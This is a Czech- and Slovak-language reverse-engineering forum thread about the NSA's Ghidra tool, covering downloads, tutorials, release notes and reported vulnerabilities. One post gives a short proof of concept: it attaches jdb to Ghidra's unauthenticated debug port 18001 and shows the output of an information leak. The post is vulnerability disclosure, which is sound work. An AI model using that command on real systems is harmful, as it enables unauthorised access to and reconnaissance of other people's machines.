RE FORUM
[REVERSE ENGINEERING] => Tools => Topic started by: DARKER on March 06, 2019, 08:07:57 AM
-
Download:
https://ghidra-sre.org/
First Look at Ghidra
https://www.youtube.com/watch?v=285b_DEmvHY (https://www.youtube.com/watch?v=285b_DEmvHY)
Quick Analysis of a Trickbot Sample with NSA's Ghidra SRE Framework
http://www.peppermalware.com/2019/03/quick-analysis-of-trickbot-sample-with.html (http://www.peppermalware.com/2019/03/quick-analysis-of-trickbot-sample-with.html)
-
Už jsem na to koukal a musím říct, že to vypadá dost dobře. A pokud kolem toho vznikne komunita, bude to velká pecka.
Jen jsem přemýšlel, proč to vlastně uvolňovali. Napadly mě asi dvě možnosti:
1. Hledají nové lidi na konkrétní pozice spojené s RCE
2. Mají něco lepšího (pokud to skutečně vyvíjejí od roku 2000, je to skoro 20 let stará aplikace) a rozhodli se tohle věnovat veřejnosti, aby byli zase jednou za ty hodné
-
NSA RE Tool 'GHIDRA' Backed Port - Java Debug Wire Protocol (JDWP) Port Opened(TCP/18001)
Exploit PoC:
jdb -attach x.x.x.x:18001 <= No auth
$ jdb -attach x.x.x.x:18001
Set uncaught java.lang.Throwable
Set deferred uncaught java.lang.Throwable
Initializing jdb ...
>
Information leaks can be leveraged to determine details about the remote OS
platform and Java installation configuration through the "classpath" command.
> classpath
base directory: C:\Windows\system32
classpath: [ ** MASKED ** list of jar's loaded in remote JVM ]
bootclasspath: [ ** MASKED ** list of JRE paths ]
>
-
Myslim si, ze sa im nema o to kto starat, testovat im to, vyvijat, napady ...
Takto sa im o to postaraju ludia, spravia uzitocne pluginy ...
Cim viac sa to bude pouzivat tym to bude vymakanejsie ...
Som zvedavy ako na to zareaguje Ilfak ... (IDA)
-
(https://i.ibb.co/Y0ZNrKr/stuxnet-ghidra.png)
-
Ghidra tutorial
https://www.youtube.com/watch?v=tH9A2zVIzKI (https://www.youtube.com/watch?v=tH9A2zVIzKI)
-
Tak zatím to vypadá, že těch problémů bude víc, než bych čekal :-X
Aktuálně byla nalezena zranitelnost XXE
https://twitter.com/sghctoma/status/1103392091009413120 (https://twitter.com/sghctoma/status/1103392091009413120)
-
První skripty pro Ghidra.
https://github.com/ghidraninja/ghidra_scripts (https://github.com/ghidraninja/ghidra_scripts)
-
tez mi prijde ze chteji comunitu aby jim to vylepsila a docela seto rozjizdi viz issues na githubu nebo treba Toshiba MeP processor module for GHIDRA >> https://github.com/xyzz/ghidra-mep
-
Ghidra v9.0.1 (March 2019)
Change Log + Download:
https://ghidra-sre.org/releaseNotes.html
-
https://www.reddit.com/r/ghidra (https://www.reddit.com/r/ghidra)
-
NSA today finally released the complete source code for GHIDRA version 9.0.2 which is now available on its Github repository.
https://github.com/NationalSecurityAgency/ghidra (https://github.com/NationalSecurityAgency/ghidra)
-
16. 5. vyšla Ghidra 9.0.4 (verze 9.0.3 byla přeskočená). Podle changelogu se daří reagovat na bugy reportovaný komunitou a fixovat je.
-
pekne ale furt mi to nejak nejde skompilovat :/
-
Download release buildu ti nestaci?
-
Je k dispozici Ghidra v9.1 BETA. Vypada to, ze je tam hromada improvements a bugfixes:
https://ghidra-sre.org/releaseNotes_9.1.html
-
Flaw in National Security Agency’s Ghidra reverse-engineering tools allows hackers to execute code in vulnerable systems.
https://threatpost.com/bug-in-nsas-ghidra/148787/ (https://threatpost.com/bug-in-nsas-ghidra/148787/)
-
V Ghidra 10.0 bude debugger: https://ghidra-sre.org/releaseNotes_10.0beta.html
-
Ghidra se pořád pere s chybou Log4Shell
https://github.com/NationalSecurityAgency/ghidra/issues/3736 (https://github.com/NationalSecurityAgency/ghidra/issues/3736)